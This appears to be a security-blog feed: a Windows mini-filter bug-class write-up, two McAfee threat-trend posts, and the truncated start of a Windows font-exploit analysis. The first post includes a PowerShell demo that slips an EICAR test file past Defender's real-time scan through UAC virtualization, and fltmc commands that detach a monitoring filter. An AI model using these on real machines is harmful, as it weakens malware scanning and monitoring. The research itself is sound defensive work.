The Windows platform is constantly iterating new features; this is even more true since the release of Windows 10 and its six month release cycles. This can introduce new features to the IO stack such as new information classes or IO control codes or additional functionality to existing features.

For the most part the mini-filter driver can just ignore operations it doesn’t care about. However, if it does process an IO operation it needs to match with what’s implemented in the rest of the OS, which can be difficult if the OS changes around the driver.

An example of this issue is the WOF driver’s handling of reparse points. To prevent applications from setting arbitrary reparse points with the IO_REPARSE_TAG_WOF tag it handles the FSCTL_SET_REPARSE_POINT IO control code and rejects any attempt to set a reparse point buffer with that tag. To complete the trick the driver also hides a file’s reparse point from being queried or removed if it’s set to IO_REPARSE_TAG_WOF.

The issue CVE-2020-17139 resulted from the OS adding a new FSCTL_SET_REPARSE_POINT_EX IO control code which the WOF driver didn’t handle. This allowed an application to add or remove the WOF IO tag which resulted in a way of getting an arbitrary file to have a cached code signature to bypass mechanisms such as Windows Defender Application Control.

Altitude sickness

Sorry, I couldn’t resist the pun. This is a bug class which is caused by the ordering of filter operations based on the assigned altitudes of the driver. For example, if you look at the list of filters from the fltmc command shown earlier in this blog post you’ll notice that WdFilter which is the real-time scanner for Windows Defender is at a much higher altitude than LUAFV which is the UAC file virtualization driver.

What this means is if LUAFV performs some operations, such as calling FltCreateFileEx which only dispatches the IO request to filters below LUAFV then Windows Defender will miss the file operations and not be able to act on them. Let’s show this in action with a simple PowerShell script.

function Write-EICAR {
    param([string]$Path)
    # Replace with a real EICAR string.
    $eicar = [System.Text.Encoding]::ASCII.GetBytes("<EICAR>")
    Use-NtObject($f = New-NtFile -Win32Path $Path -Disposition OpenIf -Access ReadData, WriteData) {
        $f.Length = 0
        Write-NtFile $f $eicar -Offset 0
    }
}

PS> Write-EICAR -Path "$env:TEMP\eicar.txt"
PS> Enable-NtTokenVirtualization
PS> Write-EICAR -Path "$env:windir\system32\license.rtf"

The Write-EICAR function opens or creates a new file at a specified path, truncates the file to a zero length, writes the EICAR string then closes the file. Note I’ve replaced the EICAR string with the dummy <EICAR>. You’ll need to look up the real string online and replace it before running the test. I did this to prevent some overzealous AV detecting the EICAR string and quarantining this web page.

We create an EICAR file in the temporary folder. Once the file has been closed Windows Defender’s real-time scanner should scan it and warn the user that it has quarantined the file.

However, once we enable virtualization using Enable-NtTokenVirtualization and write to an existing system file the file processing is handled inside the LUAFV driver after WdFilter has done its checking. Therefore the second command will succeed, although the file which is actually created is in the user’s virtual store, we’ve not overwritten license.rtf.

It’s worth pointing out that this only allows you to create the file on disk. The instant that virtualized file is used by any application Windows Defender will see it and quarantine it. Therefore it provides no real value to bypass Windows Defender’s signature checks. However, I think this is an interesting demonstration of the types of issues you could find due to the differing altitudes.

The mismatch with the filter altitude is also a potential reason you’ll miss file events in Process Monitor. Process Monitor runs its mini-filter to capture file events at altitude 385200, which is above LUAFV, so you will not see most direct virtualization events. However we can do something about this: we can use fltmc to detach the Process Monitor filter from a volume and reattach it at a much lower altitude. Start Process Monitor then run the following commands to reattach to the C: drive.

C:\> fltmc detach PROCMON24 C:
C:\> fltmc attach PROCMON24 C: -i "Process Monitor 24 Instance" -a 100

You might need to replace 24 with an appropriate version number for your version of Process Monitor. You should start seeing more events which were previously hidden by LUAFV and other filter drivers at lower altitudes. This should help you monitor file access for any interesting behavior. Sadly even though you can try and attach the Process Monitor filter to the named pipe device it won’t work as the driver doesn’t indicate support for that device.

Note that stopping and starting the Process Monitor capture will reset the volume instances for the filter driver and remove the low altitude instance. If you create the new instance without the instance name (the string after -i) then it won’t get deleted, however Process Monitor will show duplicate entries for any IO request which is the same at both altitudes. The Process Monitor driver does not support attaching at a different altitude through any command line options; this would be one of those cases where it’d be useful for this tooling to be open source so that the feature could be added.

As an example before adding the low altitude instance if you create the EICAR test file you’ll see the following events:

ID | Path                                                                   | Operation    | Result  | Detail
0  | C:\Windows\System32\license.rtf                                        | CreateFile   | SUCCESS | Desired Access: Read Data, Write Data
1  | C:\Windows\System32\license.rtf                                        | SetEndOfFile | SUCCESS | EndOfFile: 0
2  | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | WriteFile    | SUCCESS | Offset: 0, Length: 68
3  | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CloseFile    | SUCCESS |
I’ve added an ID column which indicates the event taking place. The events match the code for creating the EICAR file, we open the file for read and write access, set the length to 0, write the EICAR string and then close the file. Note that in event ID 2 the path to the file has changed from the original one in system32 to the virtual store. This is because the file is “delay virtualized” so it’ll only be created if a write IO request, such as changing the file length, is dispatched to the file.

Now let’s compare the events when the altitude is set to 100:

ID | Path                                                                   | Operation    | Result        | Detail
0  | C:\Windows\System32\license.rtf                                        | CreateFile   | ACCESS DENIED | Desired Access: Read Data, Write Data
   | C:\Windows\System32\license.rtf                                        | CreateFile   | SUCCESS       | Desired Access: Read Data
1  | C:\Windows\System32\license.rtf                                        | CreateFile   | SUCCESS       | Desired Access: Read Data, Read Attributes
   | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CreateFile   | SUCCESS       | Desired Access: Write Data, Write Attributes
   | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | SetEndOfFile | SUCCESS       | EndOfFile: 538
   | C:\Windows\System32\license.rtf                                        | ReadFile     | SUCCESS       | Offset: 0, Length: 538
   | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | WriteFile    | SUCCESS       | Offset: 0, Length: 538
   | C:\Windows\System32\license.rtf                                        | ReadFile     | END OF FILE   | Offset: 538, Length: 16,384
   | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CloseFile    | SUCCESS       |
   | C:\Windows\System32\license.rtf                                        | CloseFile    | SUCCESS       |
   | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CreateFile   | SUCCESS       | Desired Access: Read Data, Write Data
   | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | SetEndOfFile | SUCCESS       | EndOfFile: 0
2  | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | WriteFile    | SUCCESS       | Offset: 0, Length: 68, Priority: Normal
3  | C:\Windows\System32\license.rtf                                        | CloseFile    | SUCCESS       |
   | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CloseFile    | SUCCESS       |

You can see that the list of events is much longer in the second case (I’ve even removed some for brevity). For event 0 it’s no longer a single create IO request for the license.rtf file. As the user doesn’t have write access when the create call is made to the file system, it results in an ACCESS DENIED error. The LUAFV driver sees the error in its post-create callback and, as virtualization is enabled, it makes a second create for read access only. This second create succeeds. Due to the altitude of LUAFV this process is normally hidden from Process Monitor.

In the first table event ID 2 we saw the caller setting the file length to 0. However in the second table we now see that the virtual file needs to be created and the contents of the original file are copied into the new virtual file. Only after that operation has been completed will the length of the file be set to 0. The last 2 events are more or less the same.

I hope this is a clear demonstration both of how the altitude directly affects the operation of mini-filter drivers as well as how much file information you might be missing in Process Monitor without realizing it.

Concurrency and Reentrancy

The IO manager is designed to operate asynchronously. It’s possible that multiple threads could be calling into the same IO driver at the same time and the filter manager is no different. There’s no explicit locking in the filter manager which would prevent multiple IO requests being dispatched at the same time to the same file object. This can lead to concurrency and reentrancy issues.

The filter driver can assign shared state based on the file stream or file object. This can be extracted in the filter when operating on the file and used to store and retrieve the current state information. If you dispatch multiple IO requests to the same file it can result in an invalid state or memory corruption issues.

An example of this kind of issue is CVE-2019-0836 which was a race condition in the LUAFV driver related to handling of the SECTION_OBJECT_POINTERS structure in the file object. Basically by racing a read against a write IO request on the same file it was possible to get the wrong SECTION_OBJECT_POINTERS structure assigned to the virtual file allowing a normal user to bypass access checks and map a read-only file as writable.

To solve this problem the driver needs to avoid maintaining complex state between pre and post operation callbacks, or across any calls out to an API which could be trapped by a user-mode application.

Incorrect Forwarding of IO Operations

We showed earlier how to retarget an IO operation to another file object by switching the TargetFileObject pointer. This needs to be done very carefully as when working with file object pointers directly almost any operation can be performed on them. For example, if a file is opened read-only a write operation can still be dispatched to the file object itself and it’ll succeed.

The only thing which prevents a user-mode application from doing this is the kernel’s check that the handle passed by the application to the NtWriteFile system call has the FILE_WRITE_DATA access right set; if not, the system call returns STATUS_ACCESS_DENIED. However, if the handle has write access to a file object but the filter driver redirects that operation to a read-only file, then the check is bypassed and the user can write to a file they don’t necessarily control.

Another place this can happen is the dispatch of IO control codes. Each control code has a flag which indicates whether the file handle requires read and/or write access for the code to be dispatched. This check is performed in the IO manager before the request ever makes it to the file system. If a filter driver blindly forwards IO control codes to a separate file, it could send a code which normally requires write access on the handle, bypassing the security check.
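
The required access is encoded directly in bits 14 and 15 of the control code (via the CTL_CODE macro), so a forwarding filter can recover and re-apply the IO manager’s check itself. A short sketch of my own, where GrantedAccess is assumed to be whatever access the filter knows applies to the target file:

// CTL_CODE(DeviceType, Function, Method, Access) =
//   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
#define IOCTL_REQUIRED_ACCESS(Code) (((Code) >> 14) & 0x3)

// Simplified mapping of the handle-level check; a real driver may need
// to consider more rights than FILE_READ_DATA/FILE_WRITE_DATA.
BOOLEAN ExampleSafeToForward(ULONG ControlCode, ACCESS_MASK GrantedAccess)
{
    ULONG Required = IOCTL_REQUIRED_ACCESS(ControlCode);
    if ((Required & FILE_READ_ACCESS) && !(GrantedAccess & FILE_READ_DATA)) {
        return FALSE;
    }
    if ((Required & FILE_WRITE_ACCESS) && !(GrantedAccess & FILE_WRITE_DATA)) {
        return FALSE;  // forwarding would bypass the IO manager's handle check
    }
    return TRUE;
}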

The LUAFV driver is a good example of a mini-filter driver where this forwarding takes place. The previously mentioned issue, CVE-2019-0836, while primarily a concurrency issue, also relies on the fact that the file object can be written to even though it was opened read-only.

Summary

In summary, I think that mini-filter drivers are an under-appreciated source of privilege escalation bugs on Windows. In part that’s because they’re not easy to understand: they have complex interactions with the rest of the IO system, which makes them difficult to analyze but can introduce really subtle and interesting issues. I hope I’ve given you enough information to better understand how mini-filter drivers function, how you communicate with them and what sorts of unique bug classes you might discover.

If you want some more information, a good blog on the inner workings of filter drivers is Of Filesystems and Other Demons. It hasn’t been updated in a long while, but it still contains some valuable information. You can also refer to MSDN, which has a fairly comprehensive section on mini-filters, as well as the Windows Driver Kit sample code. Finally, as a reminder, I’ve uploaded a filter manager header file for use in reverse engineering tools such as IDA Pro.

A Year in Review: Threat Landscape for 2020

14 January 2021 at 14:00

As we gratefully move forward into the year 2021, we have to recognise that 2020 was as tumultuous in the digital realm as it was in the physical world. Threats ranged from low-level fraudsters leveraging the pandemic as a vehicle to trick victims into parting with money for non-existent PPE, to more capable actors using low-prevalence malware in targeted campaigns. All of this played out at a time of immense personal and professional difficulty for millions of us across the world.

Dealing with the noise

What started as a trickle of phishing campaigns and the occasional malicious app quickly turned to thousands of malicious URLs and more-than-capable threat actors leveraging our thirst for more information as an entry mechanism into systems across the world. There is no question that COVID was the dominant theme of threats for the year, and whilst the natural inclination will be to focus entirely on such threats it is important to recognise that there were also very capable actors operating during this time.

For the first time, we made available a COVID-19 dashboard to complement our threat report and track the number of malicious files leveraging COVID as a potential lure. This provides real-time information on the prevalence of such campaigns, as well as clarity about the most targeted sectors and geographies. The statistics from the year clearly demonstrate the overarching theme: the volume of malicious content increased.

Whilst this is of course a major concern, we must recognise that there were also more capable threat actors operating during this time.

Ransomware – A boom time

The latter part of 2020 saw headlines about increasing ransom demands and continued successes from ransomware groups. An indication as to the reason why was provided in early 2020 in a blog published by Thomas Roccia that revealed “The number of RDP ports exposed to the Internet has grown quickly, from roughly three million in January 2020 to more than four and a half million in March.”

With RDP a common entry vector, used predominantly by post-intrusion ransomware gangs, this goes some way to explaining why we saw more victims in the latter part of 2020. Indeed, the same analysis from Thomas finds that the most common passwords deployed for RDP are hardly what we would regard as strong.

If we consider the broader landscape of more prevalent RDP (presumably driven by the immediate need for remote access during lockdowns across the globe) combined with the use of weak credentials, the success of ransomware groups becomes very evident. Indeed, later in the year we detailed our research into the Netwalker ransomware group, revealing the innovation, affiliate recruitment and, ultimately, the financial success they achieved during the second quarter of 2020.

A year of major vulnerabilities

The year also provided us with the added gift of major vulnerabilities. In August, for example, there was a series of zero-day vulnerabilities in a widely used, low-level TCP/IP software library developed by Treck, Inc. Known as Ripple20, these vulnerabilities affected hundreds of millions of devices, resulting in considerable concern about the wider supply chain of devices that we depend upon. In collaboration with JSOF, the McAfee ATR team developed detection logic and signatures for organizations to detect these vulnerabilities.

Of course, the big vulnerabilities did not end there; we had the pleasure of meeting BadNeighbour, Drovorub, and so many more. The almost seemingly endless stream of vulnerabilities with particularly high CVSS scores has meant that the need to patch sits very high on the list of priorities.

The ‘sophisticated’ attacker

As we closed out 2020, we were presented with details of ‘nation states’ carrying out sophisticated attacks. Whilst under normal circumstances such terminology should be avoided, there is no question that the level of capability we witness from certain threat campaigns is a world away from the noisy COVID phishing scams.

In August of 2020, we released the MVISION Insights dashboard, which provides a free top list of campaigns each week. This includes, most recently, tracking against the SUNBURST trojan detailed in the SolarWinds attack, and the tools stolen in the FireEye breach. What this demonstrates is that whilst prevalence is a key talking point, there exist capable threat actors targeting organizations with real precision.

One example is the Operation North Star campaign, in which the threat actors deployed an allow and block list of targets in order to limit those they would infect with a secondary implant.

The term ‘sophisticated’ is overused, and attribution is often too quickly relegated to the category of nation state. However, these revelations have demonstrated that there are campaigns whose attacks used capabilities that are not altogether common, and we are no doubt witnessing a level of innovation from threat groups that is making the challenge of defence harder.

What is clear is that 2020 was a challenging year, but as we consider what 2021 has in store, we have to celebrate the good news stories: from initiatives such as No More Ransom continuing to tackle ransomware, to the unprecedented accessibility of tools that we can all use to protect ourselves (e.g. the ATR GitHub repo, though there are more).


2021 Threat Predictions Report

By: McAfee
13 January 2021 at 09:00

The December 2020 revelations around the SUNBURST campaigns exploiting the SolarWinds Orion platform have revealed a new attack vector – the supply chain – that will continue to be exploited.

The ever-increasing use of connected devices, apps and web services in our homes will also make us more susceptible to digital home break-ins. This threat is compounded by many individuals continuing to work from home, meaning this threat not only impacts the consumer and their families, but enterprises as well.

Attacks on cloud platforms and users will evolve into a highly polarized state where they are either “mechanized and widespread” or “sophisticated and precisely handcrafted”.

Mobile users will need to beware of phishing or smishing messages aimed at exploiting and defrauding them through mobile payment services.

The use of QR codes has notably accelerated during the pandemic, raising the specter of a new generation of social engineering techniques that seek to exploit consumers and gain access to their personal data.

Finally, the most sophisticated threat actors will increasingly use social networks to target high value individuals working in sensitive industry sectors and roles.

A new year offers hope and opportunities for consumers and enterprises, but also more cybersecurity challenges. I hope you find these helpful in planning your 2021 security strategies.

–Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research 

Twitter @Raj_Samani 

2021 Predictions  

1.

Supply Chain Backdoor Techniques to Proliferate 

By Steve Grobman 

The revelations around the SolarWinds-SUNBURST espionage campaign will spark a proliferation in copycat supply chain attacks of this kind.

On December 13, 2020, the cybersecurity industry learned nation-state threat actors had compromised SolarWinds’s Orion IT monitoring and management software and used it to distribute a malicious software backdoor called SUNBURST to dozens of that company’s customers, including several high-profile U.S. government agencies.  

This SolarWinds-SUNBURST campaign is the first major supply chain attack of its kind and has been referred to by many as the “Cyber Pearl Harbor” that U.S. cybersecurity experts have been predicting for a decade and a half.

The campaign also represents a shift in tactics where nation state threat actors have employed a new weapon for cyber-espionage. Just as the use of nuclear weapons at the end of WWII changed military strategy for the next 75 years, the use of a supply chain attack has changed the way we need to consider defense against cyber-attacks.  

This supply chain attack operated at the scale of a worm such as WannaCry in 2017, combined with the precision and lethality of the 2014 Sony Pictures or 2015 U.S. government Office of Personnel Management (OPM) attacks. 

Within hours of its discovery, the magnitude of the campaign became frighteningly clear to organizations responsible for U.S. national security, economic competitiveness, and even consumer privacy and security.  

It enables U.S. adversaries to steal all manner of information, from inter-governmental communications to national secrets. Attackers can, in turn, leverage this information to influence or impact U.S. policy through malicious leaks. Every breached agency may have different secondary cyber backdoors planted, meaning that there is no single recipe to evict the intrusion across the federal government.

While some may argue that government agencies are legitimate targets for nation-state spy craft, the campaign also impacted private companies. Unlike government networks which store classified information on isolated networks, private organizations often have critical intellectual property on networks with access to the internet. Exactly what intellectual property or private data on employees has been stolen will be difficult to determine, and the full extent of the theft may never be known. 

This type of attack also poses a threat to individuals and their families given that in today’s highly interconnected homes, a breach of consumer electronics companies can result in attackers using their access to smart appliances such as TVs, virtual assistants, and smart phones to steal their information or act as a gateway to attack businesses while users are working remotely from home. 

What makes this type of attack so dangerous is that it uses trusted software to bypass cyber defenses, infiltrate victim organizations with the backdoor and allow the attacker to take any number of secondary steps. This could involve stealing data, destroying data, holding critical systems for ransom, orchestrating system malfunctions that result in kinetic damage, or simply implanting additional malicious content throughout the organization to stay in control even after the initial threat appears to have passed. 

McAfee believes the discovery of the SolarWinds-SUNBURST campaign will expose attack techniques that other malicious actors around the world will seek to duplicate in 2021 and beyond. 

 

2.

Hacking the Home to Hack the Office 

By Suhail Ansari, Dattatraya Kulkarni and Steve Povolny 

 The increasingly dense overlay of numerous connected devices, apps and web services used in our professional and private lives will grow the connected home’s attack surface to the point that it raises significant new risks for individuals and their employers. 

 While the threat to connected homes is not new, what is new is the emergence of increased functionality in both home and business devices, and the fact that these devices connect to each other more than ever before. Compounding this is the increase in remote work – meaning many of us are using these connected devices more than ever. 

In 2020, the global pandemic shifted employees from the office to the home, making the home environment a work environment. In fact, since the onset of the coronavirus pandemic, McAfee Secure Home Platform device monitoring shows a 22% increase in the number of connected home devices globally and a 60% increase in the U.S. Over 70% of the traffic from these devices originated from smart phones, laptops, other PCs and TVs, and over 29% originated from IoT devices such as streaming devices, gaming consoles, wearables, and smart lights.

McAfee saw cybercriminals increase their focus on the home attack surface with a surge in various phishing message schemes across communications channels. The number of malicious phishing links McAfee blocked grew over 21% from March to November, at an average of over 400 links per home.

This increase is significant and suggests a flood of phishing messages with malicious links entered home networks through devices with weaker security measures.

Millions of individual employees have become responsible for their employer’s IT security in a home office filled with soft targets: unprotected devices from the kitchen, to the family room, to the bedroom. Many of these home devices are “orphaned” in that their manufacturers fail to properly support them with security updates addressing new threats or vulnerabilities.

This contrasts with a corporate office environment filled with devices “hardened” by enterprise-grade security measures. We now work with consumer-grade networking equipment configured by “us” and lacking the central management, regular software updates and security monitoring of the enterprise.   

Because of this, we believe cybercriminals will advance the home as an attack surface for campaigns targeting not only our families but also corporations. The hackers will take advantage of the home’s lack of regular firmware updates, lack of security mitigation features, weak privacy policies, vulnerability exploits, and user susceptibility to social engineering.  

By compromising the home environment, these malicious actors will launch a variety of attacks on corporate as well as consumer devices in 2021. 

 

3.

Attacks on Cloud Platforms Become Highly Mechanized and Handcrafted 

By Sandeep Chandana  

Attacks on cloud platforms will evolve into a highly polarized state where they are either “mechanized and widespread” or “targeted and precisely handcrafted”.  

The COVID-19 pandemic has also hastened the pace of the corporate IT transition to the cloud, accelerating the potential for new corporate cloud-related attack schemes. With increased cloud adoption and the large number of enterprises working from home, not only is there a growing number of cloud users but also a lot more data both in motion and being transacted.  

McAfee cloud usage data from more than 30 million McAfee MVISION Cloud users worldwide shows a 50% increase overall in enterprise cloud use across all industries during the first four months of 2020. Our analysis showed an increase across all cloud categories: usage of collaboration services such as Microsoft O365 grew by 123%, use of business services such as Salesforce grew by 61%, and the largest growth was in collaboration services such as Cisco Webex (+600%), Zoom (+350%), Microsoft Teams (+300%), and Slack (+200%). From January to April 2020, corporate cloud traffic from unmanaged devices increased 100% across all verticals.

 During the same period, McAfee witnessed a surge in attacks on cloud accounts, an estimated 630% increase overall, with variations in the sectors that were targeted. Transportation led vertical industries with a 1,350% increase in cloud attacks, followed by education (+1,114%), government (+773%), manufacturing (+679%), financial services (+571%) and energy and utilities (+472%).  

The increasing proportion of unmanaged devices accessing the enterprise cloud has effectively made home networks an extension of the enterprise infrastructure. Cybercriminals will develop new, highly mechanized, widespread attacks for better efficacy against thousands of heterogenous home networks.  

One example could be a widespread brute force attack against O365 users, where the attacker seeks to leverage stolen credentials and exploit users’ poor practice of re-using passwords across different platforms and applications. As many as 65% of users reuse the same password for multiple or all accounts according to a 2019 security survey conducted by Google. Where an attacker would traditionally need to manually encode first and last name combinations to find valid usernames, a learning algorithm could be used to predict O365 username patterns.  

Additionally, cybercriminals could use AI and ML to bypass traditional network filtering technologies deployed to protect cloud instances. Instead of launching a classic brute force attack from compromised IPs until the IPs are blocked, resource optimization algorithms will be used to make sure the compromised IPs launch attacks against multiple services and sectors, to maximize the lifespan of compromised IPs used for the attacks. Distributed algorithms and reinforcement learning will be leveraged to identify attack plans primarily focused on avoiding account lockouts.   

McAfee also predicts that, as enterprise cloud security postures mature, attackers will be forced to handcraft highly targeted exploits for specific enterprises, users and applications.  

The recent Capital One breach was an example of an advanced attack of this kind. The attack was thoroughly cloud-native. It was sophisticated and intricate in that a number of vulnerabilities and misconfigurations across cloud applications (and infrastructure) were exploited and chained. It was not a matter of chance that the hackers were successful, as the attack was very well hand-crafted.  

 We believe attackers will start leveraging threat surfaces across devices, networks and the cloud in these ways in the months and years ahead. 

4.

New Mobile Payment Scams

By Suhail Ansari and Dattatraya Kulkarni

As users become more and more reliant on mobile payments, cybercriminals will increasingly seek to exploit and defraud users with scam SMS phishing or smishing messages containing malicious payment URLs.

Mobile payments have become more and more popular as a convenient mechanism to conduct transactions. The Worldpay Global Payments Report for 2020 estimated that 41% of payments today are made on mobile devices, and this number looks set to increase at the expense of traditional credit and debit cards by 2023. An October 2020 study by Allied Market Research found that the global mobile payment market size was valued at $1.48 trillion in 2019, and is projected to reach $12.06 trillion by 2027, growing at a compound annual growth rate of 30.1% from 2020 to 2027.

Additionally, the COVID-19 pandemic has driven the adoption of mobile payment methods higher as consumers have sought to avoid contact-based payments such as cash or physical credit cards. 

But fraudsters have followed the money to mobile, pivoting from PC browsers and credit cards to mobile payments. According to research by RSA’s Fraud and Risk Intelligence team, 72% of cyber fraud activity involved the mobile channel in the fourth quarter of 2019. The researchers observed that this represented “the highest percentage of fraud involving mobile apps in nearly two years and underscores a broader shift away from fraud involving web browsers on PCs.” 

McAfee predicts there will be an increase in “receive”-based mobile payment exploits, where a user receives a phishing email, direct message or smishing message telling him that he can receive a payment, transaction refund or cash prize by clicking on a malicious payment URL. Instead of receiving a payment, however, the user has been conned into sending a payment from his account.  

This could take shape in schemes where fraudsters set up a fake call center using a product return and servicing scam, where the actors send a link via email or SMS, offering a refund via a mobile payment app, but the user is unaware that they are agreeing to pay versus receiving a refund. The figures below show the fraudulent schemes in action.  

Mobile wallets are making efforts to make it easier for users to understand whether they are paying or receiving. Unfortunately, as the payment methods proliferate, fraudsters succeed in finding victims who either cannot distinguish credit from debit or can be prompted into quick action by smart social engineering.  

Governments and banks are making painstaking efforts to educate users to understand the use of one-time passwords (OTPs) and that they should not be shared. Adoption of frameworks such as caller ID authentication (also known as STIR/SHAKEN) helps ensure that the caller ID is not masked by fraudsters, but it does not prevent a fraudster from registering an entity with a name close to that of the genuine service provider.

In the same way that mobile apps have simplified the ability to conduct transactions, McAfee predicts the technology is making it easier to take advantage of the convenience for fraudulent purposes. 

5.

Qshing: QR Code Abuse in the Age of COVID 

By Suhail Ansari and Dattatraya Kulkarni 

Cybercriminals will seek new and ever cleverer ways to use social engineering and QR Code practices to gain access to consumer victims’ personal data. 

The global pandemic has created the need for all of us to operate and transact in all areas of our lives in a “contactless” way. Accordingly, it should come as no surprise that QR codes have emerged as a convenient input mechanism to make mobile transactions more efficient.  

QR code usage has proliferated into many areas, including payments, product marketing, packaging, restaurants, retail, and recreation just to name a few. QR codes are helping limit direct contact between businesses and consumers in every setting from restaurants to personal care salons, to fitness studios. They allow them to easily scan the code, shop for services or items offered, and easily purchase them.  

A September 2020 survey by MobileIron found that 86% of respondents scanned a QR code over the course of the previous year, and over half (54%) reported an increase in the use of such codes since the pandemic began. Respondents felt most secure using QR codes at restaurants or bars (46%) and retailers (38%). Two-thirds (67%) believe that the technology makes life easier in a touchless world, and over half (58%) wish to see it used more broadly in the future.

In just the area of discount coupons, an estimated 1.7 billion coupons using QR codes were scanned globally in 2017, and that number is expected to increase by a factor of three, to 5.3 billion, by 2022. In just four years, from 2014 to 2018, the use of QR codes on consumer product packaging in Korea and Japan increased by 83%. The use of QR codes in such “smart” packaging is increasing at an annual rate of 8% globally.

In India, the government’s Unique Identification Authority of India (UIDAI) uses QR codes in association with Aadhaar, India’s unique ID number, to enable readers to download citizens’ demographic information as well as their photographs.

However, the technicalities of QR codes are something of a mystery to most users, and that makes them potentially dangerous if cybercriminals seek to exploit them to target victims.  

The MobileIron report found that whereas 69% of respondents believe they can distinguish a malicious URL based on its familiar text-based format, only 37% believe they can distinguish a malicious QR code using its unique dot pattern format. Given that QR codes are designed precisely to hide the text of the URL, users find it difficult to identify, or even suspect, malicious QR codes.

Almost two-thirds (61%) of respondents know that QR codes can open a URL and almost half (49%) know that a QR code can download an application. But fewer than one-third (31%) realize that a QR code can make a payment, cause a user to follow someone on social media (22%), or start a phone call (21%). A quarter of respondents admit scanning a QR code that did something unexpected (such as take them to a suspicious website), and 16% admitted that they were unsure if a QR code actually did what it was intended to do. 

It is therefore no surprise that QR codes have been used in phishing schemes to avoid anti-phishing solutions’ attempts to identify malicious URLs within email messages. They can also be used on webpages or social media. 

In such schemes, victims scan fraudulent QRs and find themselves taken to malicious websites where they are asked to provide login, personal info, usernames and passwords, and payment information, which criminals then steal. The sites could also be used to simply download malicious programs onto a user’s device.  

McAfee predicts that hackers will increasingly use these QR code schemes and broaden them using social engineering techniques. For instance, knowing that business owners are looking to download QR code generator apps, bad actors will entice consumers into downloading malicious QR code generator apps that pretend to do the same. In the process of generating the QR code (or even pretending to generate the correct QR code), the malicious apps will steal the victim’s sensitive data, which scammers could then use for a variety of fraudulent purposes.

Although the QR codes themselves are a secure and convenient mechanism, we expect them to be misused by bad actors in 2021 and beyond. 

6.

Social Networks as Workplace Attack Vectors  

By Raj Samani 

McAfee predicts that sophisticated cyber adversaries will increasingly target, engage and compromise corporate victims using social networks as an attack vector.  

Cyber adversaries have traditionally relied heavily on phishing emails as an attack vector for compromising organizations through individual employees. However, as organizations have implemented spam detection, data loss prevention (DLP) and other solutions to prevent phishing attempts on corporate email accounts, more sophisticated adversaries are pivoting to target employees through social networking platforms to which these increasingly effective defenses cannot be applied. 

McAfee has observed such threat actors increasingly using the messaging features of LinkedIn, WhatsApp, Facebook and Twitter to engage, develop relationships with and then compromise corporate employees. Through these victims, adversaries compromise the broader enterprises that employ them. McAfee predicts that such actors will seek to broaden the use of this attack vector in 2021 and beyond for a variety of reasons.

Malicious actors have used social network platforms in broadly scoped schemes to perpetrate relatively low-level criminal scams. However, prominent actors such as APT34, Charming Kitten, and Threat Group-2889 (among others) have been identified using these platforms for higher-value, more targeted campaigns, on the strength of the medium’s capacity for enabling customized content for specific types of victims.

Operation North Star demonstrates a state-of-the-art attack of this kind. Discovered and exposed by McAfee in August 2020, the campaign showed how lax social media privacy controls and the ease of developing and using fake LinkedIn user accounts and job descriptions could be used to lure and attack defense sector employees.

Just as individuals and organizations engage potential consumer customers on social platforms by gathering information, developing specialized content, and conducting targeted interactions with customers, malicious actors can similarly use these platform attributes to target high value employees with a deeper level of engagement.  

Additionally, individual employees engage with social networks in a capacity that straddles both their professional and personal lives. While enterprises assert security controls over corporate-issued devices and place restrictions on how consumer devices access corporate IT assets, user activity on social network platforms is not monitored or controlled in the same way. As mentioned, LinkedIn and Twitter direct messaging will not be the only vectors of concern for the corporate security operations center (SOC). 

While it is unlikely that email will ever be replaced as an attack vector, McAfee foresees this social network platform vector becoming more common in 2021 and beyond, particularly among the most advanced actors. 

 


In-the-Wild Series: Windows Exploits

By: Ryan
12 January 2021 at 17:37

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)

Background

The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {
